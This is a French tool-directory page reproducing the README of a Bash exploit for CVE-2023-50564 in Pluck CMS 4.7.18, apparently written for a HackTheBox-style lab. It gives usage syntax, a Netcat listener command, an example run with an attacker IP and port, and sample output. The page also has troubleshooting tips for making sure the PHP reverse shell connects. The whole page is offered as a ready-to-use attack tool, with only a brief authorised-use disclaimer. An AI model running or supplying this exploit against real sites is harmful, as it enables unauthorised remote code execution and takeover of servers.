Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Exploit Bash automatisant l'exécution de code à distance authentifiée dans Pluck CMS 4.7.18 via un téléchargement de ZIP malveillant, déclenchant un shell inverse PHP pour CVE-2023-50564. | Kitploit
Outils/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Exploit Bash automatisant l'exécution de code à distance authentifiée dans Pluck CMS 4.7.18 via un téléchargement de ZIP malveillant, déclenchant un shell inverse PHP pour CVE-2023-50564.

Voir le dépôt
14il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-50564 - Exploitation d'exécution de code à distance (RCE) dans Pluck CMS v4.7.18

Description

Ce script exploite une vulnérabilité d'exécution de code à distance (RCE) dans Pluck CMS v4.7.18. La vulnérabilité permet à un utilisateur malveillant de télécharger un fichier PHP malveillant sur le serveur et de l'exécuter, obtenant ainsi une exécution de commandes à distance sur la machine cible.

Le script automatise l'ensemble du processus en :

  1. S'authentifier sur le panneau d'administration de Pluck CMS à l'aide des identifiants fournis.
  2. Télécharger un fichier ZIP contenant un script PHP de reverse shell malveillant.
  3. Exécuter le reverse shell PHP, donnant à l'attaquant un accès distant à la machine cible.

Remarque : Le script nécessite un écouteur Netcat sur la machine de l'attaquant pour recevoir le reverse shell.


Prérequis

Avant d'exécuter le script, assurez-vous des points suivants :

  • Netcat est installé et un écouteur est configuré pour recevoir le reverse shell.
  • Vous disposez des bonnes valeurs pour l'hôte cible, le mot de passe, l'adresse IP et le port du reverse shell.
  • Vous avez accès au panneau d'administration de Pluck CMS sur la cible.

Utilisation

./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>

Arguments :

  • -h <host> : L'hôte cible (ex. greenhorn.htb).
  • -P <password> : Le mot de passe du panneau d'administration de Pluck CMS (ex. abcd123).
  • -i <IP> : L'adresse IP de l'attaquant pour recevoir le reverse shell.
  • -p <port> : Le port sur lequel l'écouteur Netcat écoute pour capturer le reverse shell.

Exemple :

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

Étapes :

  1. Configurer l'écouteur Netcat : Sur la machine de l'attaquant, démarrez un écouteur Netcat sur le port spécifié :

    nc -nvlp <port>
    

    Par exemple :

    nc -nvlp 9001
    
  2. Exécuter le script : Fournissez les paramètres requis au script, y compris l'hôte, le mot de passe, l'adresse IP et le port.

    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. Exécution du script :

    • Le script se connecte au panneau d'administration de Pluck CMS.
    • Il télécharge un fichier ZIP contenant un script PHP de reverse shell (love.php).
    • Une fois le fichier ZIP téléchargé, le reverse shell est exécuté sur la cible, et une connexion est établie avec votre écouteur Netcat.
    • Un message clair s'affiche : "RCE is waiting for you, please go take a look.", et le script se termine après avoir suivi le temps écoulé.
  4. Accéder à la cible : Une fois le reverse shell déclenché, la connexion apparaîtra dans votre écouteur Netcat, vous donnant un accès distant à la machine cible.


POC

image


Exemple de sortie

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

Prérequis

  • cURL : Pour interagir avec Pluck CMS et télécharger des fichiers.
  • Netcat : Pour écouter le reverse shell.

Vous pouvez installer curl et netcat en utilisant les commandes suivantes s'ils ne sont pas installés :

Debian/Ubuntu :

sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora :

sudo yum install curl nc

Avertissement

Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Toute utilisation non autorisée de ce script est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant d'exploiter une vulnérabilité sur un système.


Dépannage

  1. 504 Gateway Time-out : Le script peut rencontrer cette erreur lors de la tentative d'exécution du reverse shell, mais cela n'affecte pas la réussite de l'exécution du shell. L'erreur est généralement due au fait que le serveur cible met trop de temps à répondre à la requête HTTP, mais le shell devrait tout de même fonctionner.
  2. Problèmes d'écouteur Netcat : Si vous ne recevez pas le reverse shell, assurez-vous que votre adresse IP et votre port sont correctement définis, et qu'il n'y a pas de restrictions de pare-feu empêchant la cible de se connecter à votre machine.
  3. Échec de connexion du script : Si la connexion au panneau d'administration du CMS échoue, vérifiez le mot de passe fourni et assurez-vous que le CMS est accessible sur la machine cible.

Faites-moi savoir si vous souhaitez toute autre personnalisation ou clarification dans le README !

Télécharger l’outil